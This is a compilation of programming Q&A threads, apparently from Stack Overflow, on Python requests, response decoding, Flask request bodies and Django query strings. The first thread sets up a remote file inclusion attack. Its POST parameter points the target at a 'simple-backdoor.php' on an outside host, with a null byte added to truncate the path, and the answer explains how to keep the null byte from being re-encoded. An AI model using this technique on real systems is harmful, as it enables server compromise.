Note that the following pieces of code are used for a remote file inclusion exploit in a controlled environment (not doing anything malicious here).
I'm trying to perform a post request to a URL:
resp = requests.post("http://example.com/test/index.php",data=post_data,cookies=cookie,proxies=proxies,config={'encode_uri': False})
One of the data parameters is a url which is used for file inclusion, at the end it has a nullbyte:
http://mysite.org/simple-backdoor.php%00
But what requests is doing is re-encoding the nullbyte at the end, making it useless
http%3A%2F%2Fmysite.org%2Fsimple-backdoor.php%2500
I tried appending config={'encode_uri': False}) but this results in the same behavior. Does anyone have a clue how to disable this encoding or how to introduce a nullbyte character which gets encoded to %00?
Requests v2.0.0 onwards doesn't have (thus respect) encode_uri. It tries to encode data if data isn't a string.
Use a unicode null-byte instead of %00, OR manually encode every component of data and form data as a string.
Related
I am working on a program that reads the content of a Restful API from ImportIO. The connection works, and data is returned, but it's a jumbled mess. I'm trying to clean it to only return Asins.
I have tried using the split keyword and delimiter to no success.
stuff = requests.get('https://data.import.io/extractor***')
stuff.content
I get the content, but I want to extract only Asins.
results
While .content gives you access to the raw bytes of the response payload, you will often want to convert them into a string using a character encoding such as UTF-8. the response will do that for you when you access .text.
response.txt
Because the decoding of bytes to str requires an encoding scheme, requests will try to guess the encoding based on the response’s headers if you do not specify one. You can provide an explicit encoding by setting .encoding before accessing .text:
If you take a look at the response, you’ll see that it is actually serialized JSON content. To get a dictionary, you could take the str you retrieved from .text and deserialize it using json.loads(). However, a simpler way to accomplish this task is to use .json():
response.json()
The type of the return value of .json() is a dictionary, so you can access values in the object by key.
You can do a lot with status codes and message bodies. But, if you need more information, like metadata about the response itself, you’ll need to look at the response’s headers.
For More Info: https://realpython.com/python-requests/
What format is the return information in? Typically Restful API's will return the data as json, you will likely have luck parsing the it as a json object.
https://realpython.com/python-requests/#content
stuff_dictionary = stuff.json()
With that, you can load the content is returned as a dictionary and you will have a much easier time.
EDIT:
Since I don't have the full URL to test, I can't give an exact answer. Given the content type is CSV, using a pandas DataFrame is pretty easy. With a quick StackOverflow search, I found the following answer: https://stackoverflow.com/a/43312861/11530367
So I tried the following in the terminal and got a dataframe from it
from io import StringIO
import pandas as pd
pd.read_csv(StringIO("HI\r\ntest\r\n"))
So you should be able to perform the following
from io import StringIO
import pandas as pd
df = pd.read_csv(StringIO(stuff.content))
If that doesn't work, consider dropping the first three bytes you have in your response: b'\xef\xbb\xf'. Check the answer from Mark Tolonen to get parse this.
After that, selecting the ASIN (your second column) from your dataframe should be easy.
asins = df.loc[:, 'ASIN']
asins_arr = asins.array
The response is the byte string of CSV content encoded in UTF-8. The first three escaped byte codes are a UTF-8-encoded BOM signature. So stuff.content.decode('utf-8-sig') should decode it. stuff.text may also work if the encoding was returned correctly in the response headers.
So I've got a python application that is using requests.post to make a post request with json headers, body info, etc.
Problem is that in my dictionary that gets sent as headers, I have a variable that often contains character groups like %25"" or "%2F", etc. I've seen this cause problems before if sent in body data, but that can be fixed by sending the body data as a sting rather than a dictionary. Haven't figured out how to make this work with the headers though, as you can't simply delimit the parameters with an ampersand like in body data.
How do I make sure that my cookie value is not altered in the process of the post request?
For instance, headers :
Host : blahblah.com
Connection : Keep-Alive
Cookie : My sensitive string with special characters
etc.
Note : Nothing server-side can be changed. The python application is being used for hired pentesting services.
A common technique for sending data that becomes a mess when transmitted is to encode it, especially as base64
Sender:
import base64
...
encoded_data = "base64:{}".format(base64.b64encode(data))
Receiver:
import base64
...
if encoded_data.startswith("base64:"):
data = base64.b64decode(encoded_data.split(':')[1])
I am writing a program (python Python 3.5.2) that uses a HTTPSConnection to get a JSON object as a response. I have it working using some example code, but am not sure where a method comes from.
My question is this: In the code below, the decode('utf-9') method doesn't exist in the documentation at https://docs.python.org/3.4/library/http.client.html#http.client.HTTPResponse under "21.12.2. HTTPResponse Objects". How would I know that the return value from the method "response.read()" has the method "decode('utf-8')" available?
Do Python objects inherit from a base class like C# objects do or am I missing something?
http = HTTPSConnection(get_hostname(token))
http.request('GET', uri_path, headers=get_authorization_header(token))
response = http.getresponse()
print(response.status, response.reason)
feed = json.loads(response.read().decode('utf-8'))
Thank you for your help.
The read method of the response object always returns a byte string (in Python 3, which I presume you are using as you use the print function). The byte string does indeed have a decode method, so there should be no problem with this code. Of course it makes the assumption that the response is encoded in UTF-8, which may or may not be correct.
[Technical note: email is a very difficult medium to handle: messages can be made up of different parts, each of which is differently encoded. At least with web traffic you stand a chance of reading the Content-Type header's charset attribute to find the correct encoding].
The request's content-type is application/json, but I want to get the request body bytes. Flask will auto convert the data to json. How do I get the request body?
You can get the non-form-related data by calling request.get_data() You can get the parsed form data by accessing request.form and request.files.
However, the order in which you access these two will change what is returned from get_data. If you call it first, it will contain the full request body, including the raw form data. If you call it second, it will typically be empty, and form will be populated. If you want consistent behavior, call request.get_data(parse_form_data=True).
You can get the body parsed as JSON by using request.get_json(), but this does not happen automatically like your question suggests.
See the docs on dealing with request data for more information.
To stream the data rather than reading it all at once, access request.stream.
If you want the data as a string instead of bytes, use request.get_data(as_text=True). This will only work if the body is actually text, not binary, data.
Files in a FormData request can be accessed at request.files then you can select the file you included in the FormData e.g. request.files['audio'].
So now if you want to access the actual bytes of the file, in our case 'audio' using .stream, you should make sure first that your cursor points to the first byte and not to the end of the file, in which case you will get empty bytes.
Hence, a good way to do it:
file = request.files['audio']
file.stream.seek(0)
audio = file.read()
If the data is JSON, use request.get_json() to parse it.
I have a Django View that uses a query parameter to do some content filtering. Something like this:
/page/?filter=one+and+two
/page/?filter=one,or,two
I have noticed that Django converts the + to a space (request.GET.get('filter') returns one and two), and I´m OK with that. I just need to adjust the split() function I use in the View accordingly.
But...
When I try to test this View, and I call:
from django.test import Client
client = Client()
client.get('/page/', {'filter': 'one+and+two'})
request.GET.get('filter') returns one+and+two: with plus signs and no spaces. Why is this?
I would like to think that Client().get() mimics the browser behaviour, so what I would like to understand is why calling client.get('/page/', {'filter': 'one+and+two'}) is not like browsing to /page/?filter=one+and+two. For testing purposes it should be the same in my opinion, and in both cases the view should receive a consistent value for filter: be it with + or with spaces.
What I don´t get is why there are two different behaviours.
The plusses in a query string are the normal and correct encoding for spaces. This is a historical artifact; the form value encoding for URLs differs ever so slightly from encoding other elements in the URL.
Django is responsible for decoding the query string back to key-value pairs; that decoding includes decoding the URL percent encoding, where a + is decoded to a space.
When using the test client, you pass in unencoded data, so you'd use:
client.get('/page/', {'filter': 'one and two'})
This is then encoded to a query string for you, and subsequently decoded again when you try and access the parameters.
This is because the test client (actually, RequestFactory) runs django.utils.http.urlencode on your data, resulting in filter=one%2Band%2Btwo. Similarly, if you were to use {'filter': 'one and two'}, it would be converted to filter=one%20and%20two, and would come into your view with spaces.
If you really absolutely must have the pluses in your query string, I believe it may be possible to manually override the query string with something like: client.get('/page/', QUERY_STRING='filter=one+and+two'), but that just seems unnecessary and ugly in my opinion.